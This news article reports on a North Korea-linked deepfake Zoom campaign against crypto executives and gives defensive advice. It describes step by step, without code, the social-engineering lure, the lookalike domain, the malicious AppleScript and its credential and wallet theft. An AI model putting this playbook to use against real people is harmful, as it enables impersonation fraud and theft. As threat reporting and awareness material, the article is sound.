A sophisticated deepfake Zoom scam linked to North Korean hackers is targeting cryptocurrency executives with alarming speed and precision. The attack, attributed to the hacking group BlueNoroff (also tracked as TA444, STARDUST CHOLLIMA, and UNC1069), compromises high-value targets in under five minutes by combining social engineering, AI-generated video deepfakes, and malware deployment. Security researchers at Huntress identified the campaign after discovering at least eight malware payloads on a compromised Web3 employee’s machine, revealing a coordinated operation that has stolen over $300 million from crypto organizations.
Key Takeaways
- BlueNoroff hackers use compromised executive accounts to send fake Calendly meeting invites that redirect to fraudulent Zoom domains.
- Deepfake video feeds of senior executives appear in the fake Zoom session and request installation of malicious software.
- Malware payloads steal Keychain credentials, browser cookies, Telegram sessions, and cryptocurrency wallet information.
- North Korea-linked actors now account for 76% of all global crypto service compromises, stealing $2.02 billion in 2025 alone.
- The entire attack sequence from initial contact to credential theft completes in under five minutes.
How the deepfake Zoom scam works step by step
The deepfake Zoom scam begins with credential theft. Attackers compromise a cryptocurrency executive’s Telegram account or LinkedIn profile, then use that hijacked identity to contact secondary targets within the organization. This trusted-source approach bypasses initial skepticism and sets the stage for the technical attack.
Once contact is established, the attacker sends a Calendly link for what appears to be a legitimate 30-minute video call. According to Huntress researchers, “The Calendly link was for a Google Meet event, but when clicked… redirects the end user to a fake Zoom domain controlled by the threat actor.” The fake domain mimics legitimate Zoom infrastructure—one example identified was “support.us05web-zoom.biz”—and appears authentic to the untrained eye.
When the victim joins the session, they encounter deepfake video feeds of their own senior executives. The AI-generated deepfakes cite microphone troubles or technical issues, creating urgency and justifying an unusual request: installation of a “Zoom extension” packaged as a malicious AppleScript file named zoom_sdk_support.scpt. The victim, believing they are troubleshooting a legitimate meeting, complies.
The malware payload and data exfiltration
Once executed, the AppleScript opens a legitimate Zoom SDK page to maintain the illusion of legitimacy. Behind the scenes, it fetches a shell script that disables bash history logging—erasing evidence of the attack—checks and installs Rosetta 2 silently, and creates a hidden “.pwd” file. The script then downloads multiple malicious binaries to a hidden directory (“/tmp/icloud_helper”) while prompting the user for their system password.
Huntress identified eight distinct malware payloads on the compromised machine, each with a specialized function. These tools steal Keychain credentials (macOS password vault), extract browser cookies and login data, access Telegram session information, hijack cryptocurrency wallets, steal clipboard data, and erase forensic traces. Mandiant, investigating a similar intrusion at a fintech crypto company, identified seven distinct malware families attributed to the same group, confirming this is not an isolated incident.
The speed of the attack is remarkable. From the moment the victim clicks the Calendly link to the completion of malware installation and initial data exfiltration, the entire process unfolds in under five minutes. This compressed timeline leaves little room for detection or manual intervention, which is why the campaign has proven so effective against even security-conscious organizations.
North Korea’s expanding crypto theft operation
The deepfake Zoom scam is part of a much larger North Korean cyber operation targeting cryptocurrency infrastructure globally. According to Chainalysis data, North Korean-linked actors stole $2.02 billion in digital assets in 2025, representing a 51% year-over-year increase from $1.34 billion in 2024. More concerning, these operations now account for 76% of all global crypto service compromises, up from historical averages.
The cumulative lower-bound estimate of DPRK crypto theft has surpassed $6.75 billion. Specific targets have included Polygon co-founder, BTC Prague organizer Martin Kuchař, and founders of AI startups, suggesting BlueNoroff is systematically mapping high-value individuals across the crypto ecosystem. The shift from basic phishing emails to AI-generated deepfakes represents a significant escalation in sophistication and operational capability.
This evolution mirrors a broader pattern in North Korean cyber operations. Attackers have moved beyond credential harvesting toward real-time video manipulation, using deepfakes to overcome human skepticism in ways that static emails cannot. The technique is particularly effective against remote workers who are accustomed to video calls but may not yet recognize deepfake artifacts in compressed video streams.
Defense strategies and warning signs
Security researchers warn that unfamiliar calendar links, sudden platform changes, or requests to install new software are red flags. The most reliable defense remains direct verification: if you receive an unexpected meeting invite from a colleague, call them directly using a known phone number to confirm before clicking any links. Do not rely on phone numbers or contact information in the email itself.
Huntress researchers emphasize the human element: “Remote workers, especially in high-risk areas of work, are often the ideal targets for groups like TA444… It is important to train employees to identify common attacks that start off with social engineering related to remote meeting software.” Organizations should implement mandatory security training focused on meeting platform impersonation, credential verification procedures, and the dangers of installing unexpected software during video calls.
Technical controls also matter. Endpoint detection and response (EDR) tools should flag AppleScript execution from unexpected sources, particularly scripts that attempt to disable logging or download binaries to hidden directories. Browser isolation and conditional access policies can prevent compromised credentials from being used to access sensitive systems, even if Keychain data is stolen.
Is the deepfake Zoom scam likely to target my organization?
If your organization operates in cryptocurrency, fintech, blockchain, or Web3, the risk is significant. BlueNoroff has demonstrated a clear focus on high-value crypto targets, and the campaign is active and evolving. Even if you are not a direct cryptocurrency company, any organization with executives who hold crypto assets or sit on crypto-related boards is a potential target.
What makes deepfake video harder to detect than audio deepfakes?
Video deepfakes benefit from lower bandwidth and compression artifacts that obscure unnatural facial movements. In a Zoom call with multiple participants and reduced video quality, the subtle imperfections in AI-generated faces are harder to spot than they would be in a high-resolution video. Attackers also exploit the brief, distraction-filled nature of business calls—most participants are multitasking and not scrutinizing video feeds closely.
How can I verify a meeting invite if I’m suspicious?
Call the person directly using a phone number from your company directory or a previous email thread, not from the suspicious invite. Ask them directly if they scheduled a meeting with you. If they did not, report the email to your security team immediately. This simple step defeats the entire social engineering premise of the deepfake Zoom scam.
The deepfake Zoom scam represents a watershed moment in cryptocurrency security. North Korean operators have moved beyond stealing passwords—they are now stealing entire sessions through video impersonation, executing complex attacks in minutes, and targeting the individuals and organizations most likely to hold valuable digital assets. For crypto executives and remote workers in high-risk sectors, skepticism toward unexpected meeting invites is no longer paranoia—it is a required survival skill. The attack’s speed and sophistication mean that your only reliable defense is verification before engagement, not detection after compromise.
This article was written with AI assistance and editorially reviewed.
Source: TechRadar
